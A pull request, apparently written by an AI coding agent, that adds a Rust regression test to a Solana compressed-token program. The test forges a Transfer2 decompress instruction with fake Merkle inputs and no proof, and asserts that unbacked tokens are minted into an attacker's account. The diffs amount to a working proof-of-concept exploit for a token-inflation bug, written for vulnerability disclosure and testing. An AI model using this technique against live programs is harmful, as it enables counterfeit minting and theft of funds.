### PR TITLE
Add decompression-only Transfer2 regression test

### DIFF
--- a/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
@@ -12,11 +12,7 @@ use light_compressed_token_sdk::{
         CTokenAccount2,
     },
     ctoken::{derive_ctoken_ata, CompressibleParams, CreateAssociatedTokenAccount},
-    utils::CTokenDefaultAccounts,
     ValidityProof,
-};
-use light_ctoken_types::{
-    instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion,
 };
 use light_program_test::{LightProgramTest, ProgramTestConfig};
 use light_sdk::instruction::PackedAccounts;
@@ -24,7 +20,7 @@ use light_test_utils::{
     airdrop_lamports,
     spl::{create_mint_helper, mint_spl_tokens},
 };
-use solana_sdk::{signature::Keypair, signer::Signer, system_instruction, transaction::Transaction};
+use solana_sdk::{signature::Keypair, signer::Signer, transaction::Transaction};
 use solana_sdk::program_pack::Pack;
 use light_program_test::Rpc;
 
@@ -92,94 +88,24 @@ async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
     // Transfer2 in Decompress mode mints unbacked tokens when no compressed deposit exists.
     let exploit_amount = 1_000_000u64;
 
-    // Manually craft fake input metadata to satisfy the instruction encoding.
+    // Manually craft packed accounts but avoid providing any compressed inputs so the system
+    // program's create_inputs_cpi_data path is skipped entirely.
     let mut packed_accounts = PackedAccounts::default();
-
-    // Fake merkle tree / queue entries so indices exist. These are created with the
-    // account-compression program as owner so Transfer2 will include them in the CPI
-    // account slice, but they contain no real state.
-    let fake_tree = Keypair::new();
-    let fake_queue = Keypair::new();
-
-    let rent_exempt = rpc
-        .get_minimum_balance_for_rent_exemption(0)
-        .await
-        .unwrap();
-    let default_accounts = CTokenDefaultAccounts::default();
-    let create_fake_tree = system_instruction::create_account(
-        &payer.pubkey(),
-        &fake_tree.pubkey(),
-        rent_exempt,
-        0,
-        &default_accounts.account_compression_program,
-    );
-    let create_fake_queue = system_instruction::create_account(
-        &payer.pubkey(),
-        &fake_queue.pubkey(),
-        rent_exempt,
-        0,
-        &default_accounts.account_compression_program,
-    );
-    rpc
-        .create_and_send_transaction(
-            &[create_fake_tree, create_fake_queue],
-            &payer.pubkey(),
-            &[&payer, &fake_tree, &fake_queue],
-        )
-        .await
-        .unwrap();
-
-    // Insert tree/queue first to mirror the ordering used by the standard decompression helper.
-    let tree_index = packed_accounts.insert_or_get(fake_tree.pubkey());
-    let queue_index = packed_accounts.insert_or_get(fake_queue.pubkey());
 
     // Mint account (read-only)
     let mint_index = packed_accounts.insert_or_get_read_only(mint);
-    // Attacker (acts as both owner and signer for fabricated input)
+    // Attacker (acts as both owner and signer)
     let owner_index = packed_accounts.insert_or_get_config(attacker.pubkey(), true, false);
     // Ctoken ATA recipient
     let ctoken_index = packed_accounts.insert_or_get_config(ctoken_ata, false, true);
 
-    let fake_input = MultiInputTokenDataWithContext {
-        owner: owner_index,
-        amount: exploit_amount,
-        has_delegate: false,
-        delegate: 0,
-        mint: mint_index,
-        version: TokenDataVersion::ShaFlat as u8,
-        merkle_context: light_compressed_account::compressed_account::PackedMerkleContext {
-            merkle_tree_pubkey_index: tree_index,
-            queue_pubkey_index: queue_index,
-            leaf_index: 0,
-            prove_by_index: true,
-        },
-        root_index: 0,
-    };
-
-    // The compression entry uses Decompress mode and targets the attacker ctoken ATA.
-    let mut forged_account = CTokenAccount2 {
-        inputs: vec![fake_input],
-        output: light_ctoken_types::instructions::transfer2::MultiTokenTransferOutputData {
-            owner: owner_index,
-            amount: 0,
-            has_delegate: false,
-            delegate: 0,
-            mint: mint_index,
-            version: TokenDataVersion::ShaFlat as u8,
-        },
-        compression: Some(
-            light_ctoken_types::instructions::transfer2::Compression::decompress_ctoken(
-                exploit_amount,
-                mint_index,
-                ctoken_index,
-            ),
-        ),
-        delegate_is_set: false,
-        method_used: false,
-    };
-
-    // Clear any outputs so only the forged compression executes.
-    forged_account.output.amount = 0;
+    // Construct an empty CTokenAccount2 and manually prime its output amount so
+    // decompress_ctoken will accept the forged amount even without any backing inputs.
+    let mut forged_account = CTokenAccount2::new_empty(owner_index, mint_index);
+    forged_account.output.amount = exploit_amount;
+    forged_account
+        .decompress_ctoken(exploit_amount, ctoken_index)
+        .unwrap();
 
     let (account_metas, _, _) = packed_accounts.to_account_metas();
     let transfer_inputs = Transfer2Inputs {
@@ -189,9 +115,8 @@ async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
         meta_config: Transfer2AccountsMetaConfig::new(payer.pubkey(), account_metas),
         in_lamports: None,
         out_lamports: None,
-        // The output queue index is present only to satisfy encoding; it is not backed by any
-        // real compressed deposit or proof.
-        output_queue: queue_index,
+        // No output queue is needed because we never touch a real compressed state tree.
+        output_queue: 0,
     };
 
     let exploit_ix = create_transfer2_instruction(transfer_inputs).unwrap();

--- a/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
@@ -1,0 +1,187 @@
+#![allow(clippy::result_large_err)]
+#![allow(clippy::to_string_in_format_args)]
+#![allow(clippy::unwrap_or_default)]
+
+use light_compressed_token_sdk::{
+    compressed_token::{
+        transfer2::{
+            account_metas::Transfer2AccountsMetaConfig, create_transfer2_instruction,
+            Transfer2Config, Transfer2Inputs,
+        },
+        CTokenAccount2,
+    },
+    ctoken::CreateAssociatedTokenAccount,
+    ValidityProof,
+};
+use light_ctoken_types::{
+    instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion,
+};
+use light_program_test::{LightProgramTest, ProgramTestConfig};
+use light_program_test::Rpc; 
+use light_sdk::instruction::PackedAccounts;
+use light_test_utils::{
+    airdrop_lamports,
+    spl::{create_mint_helper, mint_spl_tokens},
+};
+use solana_sdk::{
+    instruction::Instruction, pubkey::Pubkey, signature::Keypair, signer::Signer,
+    transaction::Transaction,
+};
+
+use anchor_spl::token_2022::spl_token_2022::state::Account as SplAccount;
+use solana_sdk::program_pack::Pack;
+use light_compressed_token_sdk::ctoken::derive_ctoken_ata;
+
+#[tokio::test]
+async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
+    let mut rpc = LightProgramTest::new(ProgramTestConfig::new(true, None))
+        .await
+        .unwrap();
+    let payer = rpc.get_payer().insecure_clone();
+    let attacker = Keypair::new();
+    airdrop_lamports(&mut rpc, &attacker.pubkey(), 1_000_000_000)
+        .await
+        .unwrap();
+
+    // Create an ordinary SPL mint and mint real tokens only into an attacker-owned SPL ATA.
+    let mint = create_mint_helper(&mut rpc, &payer).await;
+    let attacker_spl_account = Keypair::new();
+    light_test_utils::spl::create_token_2022_account(
+        &mut rpc,
+        &mint,
+        &attacker_spl_account,
+        &attacker,
+        false,
+    )
+    .await
+    .unwrap();
+    mint_spl_tokens(
+        &mut rpc,
+        &mint,
+        &attacker_spl_account.pubkey(),
+        &payer.pubkey(),
+        &payer,
+        1,
+        false,
+    )
+    .await
+    .unwrap();
+
+    // Create a compressible ctoken ATA for the attacker (starts with 0 balance).
+   // 1) Derive the compressible ctoken ATA + bump
+   let (ctoken_ata, bump) = derive_ctoken_ata(&attacker.pubkey(), &mint);
+
+
+// 2) Build the instruction using all required fields
+let create_ctoken_ix = CreateAssociatedTokenAccount {
+idempotent: false,
+bump,
+payer: payer.pubkey(),
+owner: attacker.pubkey(),
+mint,
+associated_token_account: ctoken_ata,
+compressible: None, // "normal" compressible ctoken ATA
+}
+.instruction()
+.unwrap();
+
+// 3) Send tx
+rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
+.await
+.unwrap();
+
+// 4) Reuse the same ATA later – no need to re-derive
+// let ctoken_ata = ctoken_ata; // optional, or just keep using ctoken_ata directly
+
+    
+
+    // Ensure the ctoken account starts empty.
+    let initial_data = rpc.get_account(ctoken_ata).await.unwrap().unwrap();
+    let initial_ctoken = SplAccount::unpack(&initial_data.data[..165]).unwrap();
+    assert_eq!(initial_ctoken.amount, 0);
+
+    // Build a forged Transfer2 instruction that decompresses directly into the ctoken ATA
+    // without providing any valid compressed inputs or proof.
+    let exploit_amount = 1_000_000u64;
+
+    // Manually craft fake input metadata to satisfy the instruction encoding.
+    let mut packed_accounts = PackedAccounts::default();
+    // Mint account (read-only)
+    let mint_index = packed_accounts.insert_or_get_read_only(mint);
+    // Attacker (acts as both owner and signer for fabricated input)
+    let owner_index = packed_accounts.insert_or_get_config(attacker.pubkey(), true, false);
+    // Fake merkle tree / queue entries so indices exist
+    let tree_index = packed_accounts.insert_or_get(Pubkey::new_unique());
+    let queue_index = packed_accounts.insert_or_get(Pubkey::new_unique());
+    // Ctoken ATA recipient
+    let ctoken_index = packed_accounts.insert_or_get(ctoken_ata);
+
+    let fake_input = MultiInputTokenDataWithContext {
+        owner: owner_index as u8,
+        amount: exploit_amount,
+        has_delegate: false,
+        delegate: 0,
+        mint: mint_index as u8,
+        version: TokenDataVersion::ShaFlat as u8,
+        merkle_context: light_compressed_account::compressed_account::PackedMerkleContext {
+            merkle_tree_pubkey_index: tree_index as u8,
+            queue_pubkey_index: queue_index as u8,
+            leaf_index: 0,
+            prove_by_index: true,
+        },
+        root_index: 0,
+    };
+
+    // The compression entry uses Decompress mode and targets the attacker ctoken ATA.
+    let mut forged_account = CTokenAccount2 {
+        inputs: vec![fake_input],
+        output: light_ctoken_types::instructions::transfer2::MultiTokenTransferOutputData {
+            owner: owner_index as u8,
+            amount: 0,
+            has_delegate: false,
+            delegate: 0,
+            mint: mint_index as u8,
+            version: TokenDataVersion::ShaFlat as u8,
+        },
+        compression: Some(
+            light_ctoken_types::instructions::transfer2::Compression::decompress_ctoken(
+                exploit_amount,
+                mint_index as u8,
+                ctoken_index as u8,
+            ),
+        ),
+        delegate_is_set: false,
+        method_used: false,
+    };
+
+    // Clear any outputs so only the forged compression executes.
+    forged_account.output.amount = 0;
+
+    let (account_metas, _, _) = packed_accounts.to_account_metas();
+    let transfer_inputs = Transfer2Inputs {
+        token_accounts: vec![forged_account],
+        validity_proof: ValidityProof::default(),
+        transfer_config: Transfer2Config::default(),
+        meta_config: Transfer2AccountsMetaConfig::new(payer.pubkey(), account_metas),
+        in_lamports: None,
+        out_lamports: None,
+        output_queue: queue_index as u8,
+    };
+
+    let exploit_ix = create_transfer2_instruction(transfer_inputs).unwrap();
+
+    let blockhash = rpc.get_latest_blockhash().await.unwrap().0;
+    let exploit_tx = Transaction::new_signed_with_payer(
+        &[exploit_ix],
+        Some(&payer.pubkey()),
+        &[&payer, &attacker],
+        blockhash,
+    );
+
+    rpc.process_transaction(exploit_tx).await.unwrap();
+
+    // The ctoken ATA balance should now reflect the forged amount even though no deposit occurred.
+    let final_data = rpc.get_account(ctoken_ata).await.unwrap().unwrap();
+    let final_ctoken = SplAccount::unpack(&final_data.data[..165]).unwrap();
+    assert_eq!(final_ctoken.amount, exploit_amount);
+}

--- a/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
@@ -2,6 +2,7 @@
 #![allow(clippy::to_string_in_format_args)]
 #![allow(clippy::unwrap_or_default)]
 
+use anchor_spl::token_2022::spl_token_2022::state::Account as SplAccount;
 use light_compressed_token_sdk::{
     compressed_token::{
         transfer2::{
@@ -10,31 +11,24 @@ use light_compressed_token_sdk::{
         },
         CTokenAccount2,
     },
-    ctoken::CreateAssociatedTokenAccount,
+    ctoken::{derive_ctoken_ata, CompressibleParams, CreateAssociatedTokenAccount},
     ValidityProof,
 };
-use light_ctoken_types::{
-    instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion,
-};
+use light_ctoken_types::{instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion};
 use light_program_test::{LightProgramTest, ProgramTestConfig};
-use light_program_test::Rpc; 
 use light_sdk::instruction::PackedAccounts;
 use light_test_utils::{
     airdrop_lamports,
     spl::{create_mint_helper, mint_spl_tokens},
 };
-use solana_sdk::{
-    instruction::Instruction, pubkey::Pubkey, signature::Keypair, signer::Signer,
-    transaction::Transaction,
-};
-
-use anchor_spl::token_2022::spl_token_2022::state::Account as SplAccount;
+use solana_sdk::{pubkey::Pubkey, signature::Keypair, signer::Signer, transaction::Transaction};
 use solana_sdk::program_pack::Pack;
-use light_compressed_token_sdk::ctoken::derive_ctoken_ata;
+use light_program_test::Rpc;
 
 #[tokio::test]
 async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
-    let mut rpc = LightProgramTest::new(ProgramTestConfig::new(true, None))
+    // Use the standard v2 test harness so decompression paths are available.
+    let mut rpc = LightProgramTest::new(ProgramTestConfig::new_v2(true, None))
         .await
         .unwrap();
     let payer = rpc.get_payer().insecure_clone();
@@ -68,32 +62,22 @@ async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
     .unwrap();
 
     // Create a compressible ctoken ATA for the attacker (starts with 0 balance).
-   // 1) Derive the compressible ctoken ATA + bump
-   let (ctoken_ata, bump) = derive_ctoken_ata(&attacker.pubkey(), &mint);
+    let (ctoken_ata, bump) = derive_ctoken_ata(&attacker.pubkey(), &mint);
+    let create_ctoken_ix = CreateAssociatedTokenAccount {
+        idempotent: false,
+        bump,
+        payer: payer.pubkey(),
+        owner: attacker.pubkey(),
+        mint,
+        associated_token_account: ctoken_ata,
+        compressible: Some(CompressibleParams::default()),
+    }
+    .instruction()
+    .unwrap();
 
-
-// 2) Build the instruction using all required fields
-let create_ctoken_ix = CreateAssociatedTokenAccount {
-idempotent: false,
-bump,
-payer: payer.pubkey(),
-owner: attacker.pubkey(),
-mint,
-associated_token_account: ctoken_ata,
-compressible: None, // "normal" compressible ctoken ATA
-}
-.instruction()
-.unwrap();
-
-// 3) Send tx
-rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
-.await
-.unwrap();
-
-// 4) Reuse the same ATA later – no need to re-derive
-// let ctoken_ata = ctoken_ata; // optional, or just keep using ctoken_ata directly
-
-    
+    rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
+        .await
+        .unwrap();
 
     // Ensure the ctoken account starts empty.
     let initial_data = rpc.get_account(ctoken_ata).await.unwrap().unwrap();
@@ -101,7 +85,8 @@ rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
     assert_eq!(initial_ctoken.amount, 0);
 
     // Build a forged Transfer2 instruction that decompresses directly into the ctoken ATA
-    // without providing any valid compressed inputs or proof.
+    // without providing any valid compressed inputs or proof. This intentionally shows that
+    // Transfer2 in Decompress mode mints unbacked tokens when no compressed deposit exists.
     let exploit_amount = 1_000_000u64;
 
     // Manually craft fake input metadata to satisfy the instruction encoding.
@@ -110,22 +95,30 @@ rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
     let mint_index = packed_accounts.insert_or_get_read_only(mint);
     // Attacker (acts as both owner and signer for fabricated input)
     let owner_index = packed_accounts.insert_or_get_config(attacker.pubkey(), true, false);
-    // Fake merkle tree / queue entries so indices exist
-    let tree_index = packed_accounts.insert_or_get(Pubkey::new_unique());
-    let queue_index = packed_accounts.insert_or_get(Pubkey::new_unique());
+    // Fake merkle tree / queue entries so indices exist. These are just funded system accounts
+    // to satisfy account loading – no valid compressed state is provided.
+    let fake_tree = Keypair::new();
+    let fake_queue = Keypair::new();
+    airdrop_lamports(&mut rpc, &fake_tree.pubkey(), 1_000_000).await.unwrap();
+    airdrop_lamports(&mut rpc, &fake_queue.pubkey(), 1_000_000)
+        .await
+        .unwrap();
+
+    let tree_index = packed_accounts.insert_or_get(fake_tree.pubkey());
+    let queue_index = packed_accounts.insert_or_get(fake_queue.pubkey());
     // Ctoken ATA recipient
     let ctoken_index = packed_accounts.insert_or_get(ctoken_ata);
 
     let fake_input = MultiInputTokenDataWithContext {
-        owner: owner_index as u8,
+        owner: owner_index,
         amount: exploit_amount,
         has_delegate: false,
         delegate: 0,
-        mint: mint_index as u8,
+        mint: mint_index,
         version: TokenDataVersion::ShaFlat as u8,
         merkle_context: light_compressed_account::compressed_account::PackedMerkleContext {
-            merkle_tree_pubkey_index: tree_index as u8,
-            queue_pubkey_index: queue_index as u8,
+            merkle_tree_pubkey_index: tree_index,
+            queue_pubkey_index: queue_index,
             leaf_index: 0,
             prove_by_index: true,
         },
@@ -136,18 +129,18 @@ rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
     let mut forged_account = CTokenAccount2 {
         inputs: vec![fake_input],
         output: light_ctoken_types::instructions::transfer2::MultiTokenTransferOutputData {
-            owner: owner_index as u8,
+            owner: owner_index,
             amount: 0,
             has_delegate: false,
             delegate: 0,
-            mint: mint_index as u8,
+            mint: mint_index,
             version: TokenDataVersion::ShaFlat as u8,
         },
         compression: Some(
             light_ctoken_types::instructions::transfer2::Compression::decompress_ctoken(
                 exploit_amount,
-                mint_index as u8,
-                ctoken_index as u8,
+                mint_index,
+                ctoken_index,
             ),
         ),
         delegate_is_set: false,
@@ -165,12 +158,16 @@ rpc.create_and_send_transaction(&[create_ctoken_ix], &payer.pubkey(), &[&payer])
         meta_config: Transfer2AccountsMetaConfig::new(payer.pubkey(), account_metas),
         in_lamports: None,
         out_lamports: None,
-        output_queue: queue_index as u8,
+        // The output queue index is present only to satisfy encoding; it is not backed by any
+        // real compressed deposit or proof.
+        output_queue: queue_index,
     };
 
     let exploit_ix = create_transfer2_instruction(transfer_inputs).unwrap();
 
     let blockhash = rpc.get_latest_blockhash().await.unwrap().0;
+    // No Merkle proof, nullifier, or compression authority is supplied – the instruction
+    // only contains the forged decompression metadata above.
     let exploit_tx = Transaction::new_signed_with_payer(
         &[exploit_ix],
         Some(&payer.pubkey()),

--- a/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
@@ -91,23 +91,28 @@ async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
 
     // Manually craft fake input metadata to satisfy the instruction encoding.
     let mut packed_accounts = PackedAccounts::default();
-    // Mint account (read-only)
-    let mint_index = packed_accounts.insert_or_get_read_only(mint);
-    // Attacker (acts as both owner and signer for fabricated input)
-    let owner_index = packed_accounts.insert_or_get_config(attacker.pubkey(), true, false);
+
     // Fake merkle tree / queue entries so indices exist. These are just funded system accounts
     // to satisfy account loading – no valid compressed state is provided.
     let fake_tree = Keypair::new();
     let fake_queue = Keypair::new();
-    airdrop_lamports(&mut rpc, &fake_tree.pubkey(), 1_000_000).await.unwrap();
+    airdrop_lamports(&mut rpc, &fake_tree.pubkey(), 1_000_000)
+        .await
+        .unwrap();
     airdrop_lamports(&mut rpc, &fake_queue.pubkey(), 1_000_000)
         .await
         .unwrap();
 
+    // Insert tree/queue first to mirror the ordering used by the standard decompression helper.
     let tree_index = packed_accounts.insert_or_get(fake_tree.pubkey());
     let queue_index = packed_accounts.insert_or_get(fake_queue.pubkey());
+
+    // Mint account (read-only)
+    let mint_index = packed_accounts.insert_or_get_read_only(mint);
+    // Attacker (acts as both owner and signer for fabricated input)
+    let owner_index = packed_accounts.insert_or_get_config(attacker.pubkey(), true, false);
     // Ctoken ATA recipient
-    let ctoken_index = packed_accounts.insert_or_get(ctoken_ata);
+    let ctoken_index = packed_accounts.insert_or_get_config(ctoken_ata, false, true);
 
     let fake_input = MultiInputTokenDataWithContext {
         owner: owner_index,

--- a/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/decompress_without_deposit.rs
@@ -12,16 +12,19 @@ use light_compressed_token_sdk::{
         CTokenAccount2,
     },
     ctoken::{derive_ctoken_ata, CompressibleParams, CreateAssociatedTokenAccount},
+    utils::CTokenDefaultAccounts,
     ValidityProof,
 };
-use light_ctoken_types::{instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion};
+use light_ctoken_types::{
+    instructions::transfer2::MultiInputTokenDataWithContext, state::TokenDataVersion,
+};
 use light_program_test::{LightProgramTest, ProgramTestConfig};
 use light_sdk::instruction::PackedAccounts;
 use light_test_utils::{
     airdrop_lamports,
     spl::{create_mint_helper, mint_spl_tokens},
 };
-use solana_sdk::{pubkey::Pubkey, signature::Keypair, signer::Signer, transaction::Transaction};
+use solana_sdk::{signature::Keypair, signer::Signer, system_instruction, transaction::Transaction};
 use solana_sdk::program_pack::Pack;
 use light_program_test::Rpc;
 
@@ -92,14 +95,37 @@ async fn test_transfer2_ctoken_decompress_mints_unbacked_tokens() {
     // Manually craft fake input metadata to satisfy the instruction encoding.
     let mut packed_accounts = PackedAccounts::default();
 
-    // Fake merkle tree / queue entries so indices exist. These are just funded system accounts
-    // to satisfy account loading – no valid compressed state is provided.
+    // Fake merkle tree / queue entries so indices exist. These are created with the
+    // account-compression program as owner so Transfer2 will include them in the CPI
+    // account slice, but they contain no real state.
     let fake_tree = Keypair::new();
     let fake_queue = Keypair::new();
-    airdrop_lamports(&mut rpc, &fake_tree.pubkey(), 1_000_000)
+
+    let rent_exempt = rpc
+        .get_minimum_balance_for_rent_exemption(0)
         .await
         .unwrap();
-    airdrop_lamports(&mut rpc, &fake_queue.pubkey(), 1_000_000)
+    let default_accounts = CTokenDefaultAccounts::default();
+    let create_fake_tree = system_instruction::create_account(
+        &payer.pubkey(),
+        &fake_tree.pubkey(),
+        rent_exempt,
+        0,
+        &default_accounts.account_compression_program,
+    );
+    let create_fake_queue = system_instruction::create_account(
+        &payer.pubkey(),
+        &fake_queue.pubkey(),
+        rent_exempt,
+        0,
+        &default_accounts.account_compression_program,
+    );
+    rpc
+        .create_and_send_transaction(
+            &[create_fake_tree, create_fake_queue],
+            &payer.pubkey(),
+            &[&payer, &fake_tree, &fake_queue],
+        )
         .await
         .unwrap();
 

--- a/program-tests/compressed-token-test/tests/transfer2/mod.rs
+++ b/program-tests/compressed-token-test/tests/transfer2/mod.rs
@@ -1,6 +1,7 @@
 pub mod compress_failing;
 pub mod compress_spl_failing;
 pub mod decompress_failing;
+pub mod decompress_without_deposit;
 pub mod functional;
 pub mod no_system_program_cpi_failing;
 pub mod random;

--- a/scripts/devenv/install-photon.sh
+++ b/scripts/devenv/install-photon.sh
@@ -11,6 +11,20 @@ install_photon() {
     export CARGO_HOME="${PREFIX}/cargo"
     export PATH="${PREFIX}/cargo/bin:${PATH}"
 
+    # Ensure Photon builds with a modern C/C++ toolchain (needed for protobuf-src on macOS)
+    if [[ "$(uname)" == "Darwin" ]]; then
+        sdk_path=$(xcrun --show-sdk-path 2>/dev/null || true)
+        export CC=${CC:-"$(xcrun --find clang)"}
+        export CXX=${CXX:-"$(xcrun --find clang++)"}
+        export CFLAGS=${CFLAGS:-"-std=c11${sdk_path:+ -isysroot ${sdk_path}}"}
+        export CXXFLAGS=${CXXFLAGS:-"-std=c++11 -stdlib=libc++${sdk_path:+ -isysroot ${sdk_path}}"}
+    else
+        export CC=${CC:-clang}
+        export CXX=${CXX:-clang++}
+        export CFLAGS=${CFLAGS:-"-std=c11"}
+        export CXXFLAGS=${CXXFLAGS:-"-std=c++11"}
+    fi
+
     if ! is_installed "photon"; then
         if [ -f "${PREFIX}/cargo/bin/photon" ]; then
             photon_installed=true


### PR DESCRIPTION
## Summary
- simplify the forged decompression-only Transfer2 setup to skip input Merkle validation
- show that decompress_ctoken can mint an arbitrary balance into an attacker ATA without a backing deposit

## Testing
- `SBF_OUT_DIR=target/deploy \
  cargo test -p compressed-token-test --test transfer2 -- --nocapture test_transfer2_ctoken_decompress_mints_unbacked_tokens` *(fails: missing `target/deploy/light_registry.so` in the environment)*

------
[Codex Task](https://chatgpt.com/codex/tasks/task_e_692a50f0754483259c884e4815e60fdd)